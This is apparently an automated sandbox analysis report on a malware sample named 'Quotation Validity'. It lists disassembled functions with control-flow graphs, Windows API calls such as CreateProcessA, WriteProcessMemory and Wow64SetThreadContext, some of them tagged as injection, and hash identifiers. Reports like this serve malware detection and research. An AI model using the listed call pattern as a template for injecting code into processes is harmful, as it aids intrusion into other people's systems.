                                                                                • Instruction Fuzzy Hash: 765146B09003098FEB14DFAAD548B9EBBF1FB48304F20C129E519A7350DB759985CFA5
                                                                                Function 078A9B64 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 699 78a9b64-78a9c05 702 78a9c3e-78a9c5e 699->702 703 78a9c07-78a9c11 699->703 710 78a9c60-78a9c6a 702->710 711 78a9c97-78a9cc6 702->711 703->702 704 78a9c13-78a9c15 703->704 705 78a9c38-78a9c3b 704->705 706 78a9c17-78a9c21 704->706 705->702 708 78a9c23 706->708 709 78a9c25-78a9c34 706->709 708->709 709->709 712 78a9c36 709->712 710->711 713 78a9c6c-78a9c6e 710->713 719 78a9cc8-78a9cd2 711->719 720 78a9cff-78a9db9 CreateProcessA 711->720 712->705 714 78a9c70-78a9c7a 713->714 715 78a9c91-78a9c94 713->715 717 78a9c7e-78a9c8d 714->717 718 78a9c7c 714->718 715->711 717->717 721 78a9c8f 717->721 718->717 719->720 722 78a9cd4-78a9cd6 719->722 731 78a9dbb-78a9dc1 720->731 732 78a9dc2-78a9e48 720->732 721->715 724 78a9cd8-78a9ce2 722->724 725 78a9cf9-78a9cfc 722->725 726 78a9ce6-78a9cf5 724->726 727 78a9ce4 724->727 725->720 726->726 729 78a9cf7 726->729 727->726 729->725 731->732 742 78a9e4a-78a9e4e 732->742 743 78a9e58-78a9e5c 732->743 742->743 744 78a9e50 742->744 745 78a9e5e-78a9e62 743->745 746 78a9e6c-78a9e70 743->746 744->743 745->746 747 78a9e64 745->747 748 78a9e72-78a9e76 746->748 749 78a9e80-78a9e84 746->749 747->746 748->749 750 78a9e78 748->750 751 78a9e96-78a9e9d 749->751 752 78a9e86-78a9e8c 749->752 750->749 753 78a9e9f-78a9eae 751->753 754 78a9eb4 751->754 752->751 753->754 756 78a9eb5 754->756 756->756
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078A9DA6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 1e4715b396829af15e7d7ea0e4470d43855e01fd21225fcc905f074462689009
                                                                                • Instruction ID: 866db470c28568d78887bb4729047522c7d2a43f332049cf898b119b892625d3
                                                                                • Opcode Fuzzy Hash: 1e4715b396829af15e7d7ea0e4470d43855e01fd21225fcc905f074462689009
                                                                                • Instruction Fuzzy Hash: C5A139B1D0466ADFEB20DF69C841BDEBAF2BB58310F148169D809E7240D774A985CF91
                                                                                Function 078A9B70 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 757 78a9b70-78a9c05 759 78a9c3e-78a9c5e 757->759 760 78a9c07-78a9c11 757->760 767 78a9c60-78a9c6a 759->767 768 78a9c97-78a9cc6 759->768 760->759 761 78a9c13-78a9c15 760->761 762 78a9c38-78a9c3b 761->762 763 78a9c17-78a9c21 761->763 762->759 765 78a9c23 763->765 766 78a9c25-78a9c34 763->766 765->766 766->766 769 78a9c36 766->769 767->768 770 78a9c6c-78a9c6e 767->770 776 78a9cc8-78a9cd2 768->776 777 78a9cff-78a9db9 CreateProcessA 768->777 769->762 771 78a9c70-78a9c7a 770->771 772 78a9c91-78a9c94 770->772 774 78a9c7e-78a9c8d 771->774 775 78a9c7c 771->775 772->768 774->774 778 78a9c8f 774->778 775->774 776->777 779 78a9cd4-78a9cd6 776->779 788 78a9dbb-78a9dc1 777->788 789 78a9dc2-78a9e48 777->789 778->772 781 78a9cd8-78a9ce2 779->781 782 78a9cf9-78a9cfc 779->782 783 78a9ce6-78a9cf5 781->783 784 78a9ce4 781->784 782->777 783->783 786 78a9cf7 783->786 784->783 786->782 788->789 799 78a9e4a-78a9e4e 789->799 800 78a9e58-78a9e5c 789->800 799->800 801 78a9e50 799->801 802 78a9e5e-78a9e62 800->802 803 78a9e6c-78a9e70 800->803 801->800 802->803 804 78a9e64 802->804 805 78a9e72-78a9e76 803->805 806 78a9e80-78a9e84 803->806 804->803 805->806 807 78a9e78 805->807 808 78a9e96-78a9e9d 806->808 809 78a9e86-78a9e8c 806->809 807->806 810 78a9e9f-78a9eae 808->810 811 78a9eb4 808->811 809->808 810->811 813 78a9eb5 811->813 813->813
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078A9DA6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 6b6c771ea183c3a68e943602bfcfbae90fe944ac1bc37d68eacbdc1854716817
                                                                                • Instruction ID: 6e6ca589aca3ffa9b6e53a25299e5eddfd4476f98edf61ee8d7a18db67d20888
                                                                                • Opcode Fuzzy Hash: 6b6c771ea183c3a68e943602bfcfbae90fe944ac1bc37d68eacbdc1854716817
                                                                                • Instruction Fuzzy Hash: AF913AB1D0476ADFEB20DF69C841BDEBBB2BB54310F148169D809E7240D774A985CF91
                                                                                Function 0182B2B7 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 814 182b2b7-182b2d7 815 182b303-182b307 814->815 816 182b2d9-182b2e6 call 1829d40 814->816 818 182b31b-182b35c 815->818 819 182b309-182b313 815->819 821 182b2e8 816->821 822 182b2fc 816->822 825 182b369-182b377 818->825 826 182b35e-182b366 818->826 819->818 869 182b2ee call 182b550 821->869 870 182b2ee call 182b560 821->870 822->815 827 182b39b-182b39d 825->827 828 182b379-182b37e 825->828 826->825 833 182b3a0-182b3a7 827->833 830 182b380-182b387 call 182af58 828->830 831 182b389 828->831 829 182b2f4-182b2f6 829->822 832 182b438-182b4f8 829->832 835 182b38b-182b399 830->835 831->835 864 182b500-182b52b GetModuleHandleW 832->864 865 182b4fa-182b4fd 832->865 836 182b3b4-182b3bb 833->836 837 182b3a9-182b3b1 833->837 835->833 839 182b3c8-182b3d1 call 182af68 836->839 840 182b3bd-182b3c5 836->840 837->836 845 182b3d3-182b3db 839->845 846 182b3de-182b3e3 839->846 840->839 845->846 847 182b401-182b405 846->847 848 182b3e5-182b3ec 846->848 871 182b408 call 182b850 847->871 872 182b408 call 182b860 847->872 848->847 850 182b3ee-182b3fe call 182af78 call 182af88 848->850 850->847 853 182b40b-182b40e 855 182b410-182b42e 853->855 856 182b431-182b437 853->856 855->856 866 182b534-182b548 864->866 867 182b52d-182b533 864->867 865->864 867->866 869->829 870->829 871->853 872->853
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0182B51E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 58858f8116320fcfd9b5cfeb5f4283d4a3fdbf8a6f4986e4e4a8e666d50f1bc1
                                                                                • Instruction ID: fb8793eea16437ca7d01ea11206cd76a6a3c68520d39d998760dc2b886487dff
                                                                                • Opcode Fuzzy Hash: 58858f8116320fcfd9b5cfeb5f4283d4a3fdbf8a6f4986e4e4a8e666d50f1bc1
                                                                                • Instruction Fuzzy Hash: E9815770A01B158FD725DF29D04479ABBF1FF88304F108A2DD48ADBA50D775EA8ACB91
                                                                                Function 032D1DC4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 873 32d1dc4-32d1e36 875 32d1e38-32d1e3e 873->875 876 32d1e41-32d1e48 873->876 875->876 877 32d1e4a-32d1e50 876->877 878 32d1e53-32d1e8b 876->878 877->878 879 32d1e93-32d1ef2 CreateWindowExW 878->879 880 32d1efb-32d1f33 879->880 881 32d1ef4-32d1efa 879->881 885 32d1f35-32d1f38 880->885 886 32d1f40 880->886 881->880 885->886 887 32d1f41 886->887 887->887
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032D1EE2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 55eb5c932d2060c451c0dcd4e547fba0a8e1febd718db4f9335179624256f42e
                                                                                • Instruction ID: 870ef52e72547ff4a7c8d14f2251520754e6b890b3f9a61fe9337317d15d7142
                                                                                • Opcode Fuzzy Hash: 55eb5c932d2060c451c0dcd4e547fba0a8e1febd718db4f9335179624256f42e
                                                                                • Instruction Fuzzy Hash: 7151C1B1D103599FDB14CFA9C884ADEBBB5BF48310F64812AE818AB211D771A885CF90
                                                                                Function 032D1DD0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 888 32d1dd0-32d1e36 889 32d1e38-32d1e3e 888->889 890 32d1e41-32d1e48 888->890 889->890 891 32d1e4a-32d1e50 890->891 892 32d1e53-32d1ef2 CreateWindowExW 890->892 891->892 894 32d1efb-32d1f33 892->894 895 32d1ef4-32d1efa 892->895 899 32d1f35-32d1f38 894->899 900 32d1f40 894->900 895->894 899->900 901 32d1f41 900->901 901->901
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032D1EE2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: a23fdfca8b14ab91228bdfa1661e1d968054daaba6502f3cdf4c3b7e457722f5
                                                                                • Instruction ID: da381e7b22f1a9834d67c98a3750c5adcf05da7e1b84e079c9dde5514bc65e5b
                                                                                • Opcode Fuzzy Hash: a23fdfca8b14ab91228bdfa1661e1d968054daaba6502f3cdf4c3b7e457722f5
                                                                                • Instruction Fuzzy Hash: A741B0B1D103599FDB14CF9AC884ADEFBB5BF48310F64812AE819AB211D771A895CF90
                                                                                Function 01825DCC Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 902 1825dcc-1825dd6 903 1825dd8-1825e99 CreateActCtxA 902->903 905 1825ea2-1825efc 903->905 906 1825e9b-1825ea1 903->906 913 1825f0b-1825f0f 905->913 914 1825efe-1825f01 905->914 906->905 915 1825f20 913->915 916 1825f11-1825f1d 913->916 914->913 918 1825f21 915->918 916->915 918->918
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01825E89
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: be1e9501c0583f60c067ad9132a4772ac63cd15486dc1b0edf4f7516dc47f400
                                                                                • Instruction ID: 74c6139a0727132a319280fe8b2543d964fb824c47951aed83467df1ee0ef4d0
                                                                                • Opcode Fuzzy Hash: be1e9501c0583f60c067ad9132a4772ac63cd15486dc1b0edf4f7516dc47f400
                                                                                • Instruction Fuzzy Hash: 9B41D075C007298FEB24CFA9C844BDDBBF5AF49304F20805AD418AB255DBB56986CF91
                                                                                Function 032D1324 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 919 32d1324-32d43dc 922 32d448c-32d44ac call 32d11fc 919->922 923 32d43e2-32d43e7 919->923 930 32d44af-32d44bc 922->930 925 32d43e9-32d4420 923->925 926 32d443a-32d4472 CallWindowProcW 923->926 933 32d4429-32d4438 925->933 934 32d4422-32d4428 925->934 928 32d447b-32d448a 926->928 929 32d4474-32d447a 926->929 928->930 929->928 933->930 934->933
                                                                                APIs
                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 032D4461
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CallProcWindow
                                                                                • String ID:
                                                                                • API String ID: 2714655100-0
                                                                                • Opcode ID: cf255ffcd618b171df7d510a13b31f1a45a2ab710dca0601c0a8ecb1c9f490c1
                                                                                • Instruction ID: dfeffbdfb19306fa4e31e8835f23b0ac65be75c2ce93460948846690f32d041e
                                                                                • Opcode Fuzzy Hash: cf255ffcd618b171df7d510a13b31f1a45a2ab710dca0601c0a8ecb1c9f490c1
                                                                                • Instruction Fuzzy Hash: D44109B59103458FDB14DF9AC488BAABBF5FF88314F24C459D519AB321D774A881CBA0
                                                                                Function 01824544 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 936 1824544-1825e99 CreateActCtxA 939 1825ea2-1825efc 936->939 940 1825e9b-1825ea1 936->940 947 1825f0b-1825f0f 939->947 948 1825efe-1825f01 939->948 940->939 949 1825f20 947->949 950 1825f11-1825f1d 947->950 948->947 952 1825f21 949->952 950->949 952->952
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01825E89
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: e35f92ca98111ed327212b193ac0adc0a76c684d16d0479e95698377681ed0f5
                                                                                • Instruction ID: 50487b9ed6dd607677ff2f5b8ddea3acdf350627e0518df535018196d4ee3e5c
                                                                                • Opcode Fuzzy Hash: e35f92ca98111ed327212b193ac0adc0a76c684d16d0479e95698377681ed0f5
                                                                                • Instruction Fuzzy Hash: 3A41CF71C007298BEB25CFA9C844BDDBBB5AF48304F20806AD518AB255DBB56985CF90
                                                                                Function 082E7668 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 953 82e7668-82e768d call 82e420c 956 82e768f-82e769f 953->956 957 82e76a2-82e7734 CreateIconFromResourceEx 953->957 961 82e773d-82e775a 957->961 962 82e7736-82e773c 957->962 962->961
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFromIconResource
                                                                                • String ID:
                                                                                • API String ID: 3668623891-0
                                                                                • Opcode ID: 6e825656b8c7ce110c29376834648e4c5c6986e2592eb828d25dc9739a64f52d
                                                                                • Instruction ID: 9fbac06ed66b9df95cbdf728b61382ddcee8845fdfc9fa32a6c3576d87379f13
                                                                                • Opcode Fuzzy Hash: 6e825656b8c7ce110c29376834648e4c5c6986e2592eb828d25dc9739a64f52d
                                                                                • Instruction Fuzzy Hash: CF318976904359AFCB11CFAAD840ADEBFF8EF49210F14805AF954A7261C339A850CFA5
                                                                                Function 082E6810 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 975 82e6810-82e6864 977 82e686f-82e687e 975->977 978 82e6866-82e686c 975->978 979 82e6883-82e68bc DrawTextExW 977->979 980 82e6880 977->980 978->977 981 82e68be-82e68c4 979->981 982 82e68c5-82e68e2 979->982 980->979 981->982
                                                                                APIs
                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,082E67FD,?,?), ref: 082E68AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: DrawText
                                                                                • String ID:
                                                                                • API String ID: 2175133113-0
                                                                                • Opcode ID: c0c4580e920188885b8aada10a035c64bd2d905e31efd5ad583de5489d18b9e9
                                                                                • Instruction ID: 79638a99fc5570da39779e321abb335f1d7754c0bd7d71ac0317614d2b034056
                                                                                • Opcode Fuzzy Hash: c0c4580e920188885b8aada10a035c64bd2d905e31efd5ad583de5489d18b9e9
                                                                                • Instruction Fuzzy Hash: 6C31E0B5D0030A9FDB10CF9AD884ADEFBF5FB58210F54842AE819A7210D375A944CFA4
                                                                                Function 082E419C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 965 82e419c-82e6864 967 82e686f-82e687e 965->967 968 82e6866-82e686c 965->968 969 82e6883-82e68bc DrawTextExW 967->969 970 82e6880 967->970 968->967 971 82e68be-82e68c4 969->971 972 82e68c5-82e68e2 969->972 970->969 971->972
                                                                                APIs
                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,082E67FD,?,?), ref: 082E68AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: DrawText
                                                                                • String ID:
                                                                                • API String ID: 2175133113-0
                                                                                • Opcode ID: 6d725568652af9aebbe9a0f87783a8d93f323f601baa4dc28068a2b4105ae47e
                                                                                • Instruction ID: 2112a7dc73cfeedabe9adad103576e4186f69d9cadaf4faea2f85f1da2bc38b8
                                                                                • Opcode Fuzzy Hash: 6d725568652af9aebbe9a0f87783a8d93f323f601baa4dc28068a2b4105ae47e
                                                                                • Instruction Fuzzy Hash: 4F31E2B5D003099FDB10CF9AD884ADEBBF5FB58210F54842EE919A7310D774A944CFA4
                                                                                Function 078A98E0 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078A9978
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 79583ce8ec1f1da2852f3b4c3c35fb9dba9eba70cb20ed464f43ea3d2c2703e9
                                                                                • Instruction ID: 5e24c9185bb88963452185765448a8c3356f25872f0989fd95461a8df137f5d6
                                                                                • Opcode Fuzzy Hash: 79583ce8ec1f1da2852f3b4c3c35fb9dba9eba70cb20ed464f43ea3d2c2703e9
                                                                                • Instruction Fuzzy Hash: A32137B5900319AFDB10CFA9C981BDEBBF5FF48310F14842AE919A7240C7789555CB60
                                                                                Function 078A98E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078A9978
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 3074b63045a24960140ac59fe305355e24c611f1a1ef75c355e0b20bb545ce76
                                                                                • Instruction ID: 8e4dbe1a1c35ce228914b6ba284d8260bb7eab0ad68bfad15c950ce567196c35
                                                                                • Opcode Fuzzy Hash: 3074b63045a24960140ac59fe305355e24c611f1a1ef75c355e0b20bb545ce76
                                                                                • Instruction Fuzzy Hash: B82127B59003599FDF10DFAAC881BDEBBF5FF48310F148429E959A7240C778A955CBA0
                                                                                Function 0182D7A0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0182D82F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 06972c30ead9d917369615d24e16075737e2f787404ef2c6a1d394e8eb1c08f8
                                                                                • Instruction ID: 757562d04e2df01ae5f8385f7781e3ff388d54d05bc1f2367289b7922569d35b
                                                                                • Opcode Fuzzy Hash: 06972c30ead9d917369615d24e16075737e2f787404ef2c6a1d394e8eb1c08f8
                                                                                • Instruction Fuzzy Hash: F121F4B6900358AFDB10CFAAD484AEEBFF4EB48310F14841AE918A3210D374A944CFA1
                                                                                Function 078A9749 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078A97CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: bd361fad3e9aec5ecf7df8b9b746dac17489d58e5e442478148db64ff3b98469
                                                                                • Instruction ID: 6d9006884fe33d6f2720f81f5b631d773941458f78778903f8162c439745bb35
                                                                                • Opcode Fuzzy Hash: bd361fad3e9aec5ecf7df8b9b746dac17489d58e5e442478148db64ff3b98469
                                                                                • Instruction Fuzzy Hash: 022149B5D003199FDB10CFAAC4857EEBBF5EF48324F14842AD419A7240D778A945CFA0
                                                                                Function 078A9750 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078A97CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: d1dd443d7bd96aa7070f1033c6a7f9f7ce0666e09b6d7a7e3a47a7b02da1e7e7
                                                                                • Instruction ID: 64e9b7f984d6d9c4035500c4ac800e763d45c51268a48b1893eba62d7857f117
                                                                                • Opcode Fuzzy Hash: d1dd443d7bd96aa7070f1033c6a7f9f7ce0666e09b6d7a7e3a47a7b02da1e7e7
                                                                                • Instruction Fuzzy Hash: 20215BB5D003199FDB20DFAAC4857EEBBF5EF48324F14842AD419A7240DB78A945CFA0
                                                                                Function 078A99D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078A9A58
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 3883683c05e169fe5203def0ba63a051b2a1b92747c4a21919a09a0010ce35cb
                                                                                • Instruction ID: e6c3ab09932356a02600e59c98dec40ea08d297e770034aa8f33de5f34674e61
                                                                                • Opcode Fuzzy Hash: 3883683c05e169fe5203def0ba63a051b2a1b92747c4a21919a09a0010ce35cb
                                                                                • Instruction Fuzzy Hash: E7212AB1D003599FDB10DF9AC840BDEBBF5FF48310F50842AE559A7240C775A555CBA0
                                                                                Function 078A99D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078A9A58
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 2d3132fb3e2bd446cc0a24b05f54b44d5724e249dc247a7b72648cf61ddc2c6a
                                                                                • Instruction ID: 5d8f4ab72433db8092a4b417b5a19eb64994464dc4cff587ec1b934f549087fa
                                                                                • Opcode Fuzzy Hash: 2d3132fb3e2bd446cc0a24b05f54b44d5724e249dc247a7b72648cf61ddc2c6a
                                                                                • Instruction Fuzzy Hash: 7B2136B5D003199FDB10CFAAC980BEEBBF5FF48310F10842AE518A7250C778A941CB60
                                                                                Function 0182D7A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0182D82F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: c8da8962d600aa39594f91a38ee00ce5e61806d06e0d95a5652c6a61baf65d8d
                                                                                • Instruction ID: 602cd77f42b865217927ce979bf011aa6eabb2a27dd04590da43cf08ae19ba69
                                                                                • Opcode Fuzzy Hash: c8da8962d600aa39594f91a38ee00ce5e61806d06e0d95a5652c6a61baf65d8d
                                                                                • Instruction Fuzzy Hash: 2621E0B59002589FDB10CFAAD884AEEBBF8EB48310F14841AE918A3310D374A944CFA5
                                                                                Function 082E420C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,082E7682,?,?,?,?,?), ref: 082E7727
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
